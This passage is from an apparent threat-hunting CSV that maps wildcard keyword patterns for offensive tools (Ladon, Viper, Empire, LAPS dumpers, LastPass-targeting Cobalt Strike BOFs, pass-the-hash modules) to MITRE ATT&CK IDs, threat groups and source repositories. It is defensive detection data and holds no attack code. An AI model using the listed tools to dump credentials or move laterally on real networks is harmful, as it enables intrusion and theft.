- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*LadonExp.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*LadonGUI.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*LadonLib.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon-N20.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Ladon-N40.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*LadonStudy.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Lalin.sh *","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"*lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*lan_fingerprint_common.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_ping_sweep.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lan_sw_port_scan.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lanjelot*","offensive_tool_keyword","Github Username","github username. creator of patator and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/lanjelot","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LANs.py*","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","10","2533","518","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z" +"*lanscan_arp.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*lansearch.exe *","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*lansearchpro_portable.zip*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*lansearchpro_setup.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*laps_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*LapsAllowedAdminGroups.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LAPSDecrypt.*","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Lapsdump.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*Lapsdump.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*LAPSDumper-main*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*LapsPasswords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LAPSToolkit*","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","N/A","Information Gathering","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","7","659","108","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z" +"*LaresLLC/SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*LasCC/Hack-Tools*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*lastpass.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass/process_lp_files.py*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*lastpass_sniffed_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lastpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Lateral/DCom.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/PSExec.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClient.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClientDelete.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClientGet.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/SMBClientPut.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Lateral/WMIExec.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*lateral_wmi.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*LateralMovement_*_Exploit*.py","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_ExploitationOfRemoteServices_MS17010.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_Other_Ladon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheHash_ByInvokeWMIExec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheHash_ByWmi.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheTicket_ByPsexec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheTicket_BySharpwmi.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*LateralMovement_PassTheTicket_ByWmi.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Launch Empire CLI*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*Launch Empire Server*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 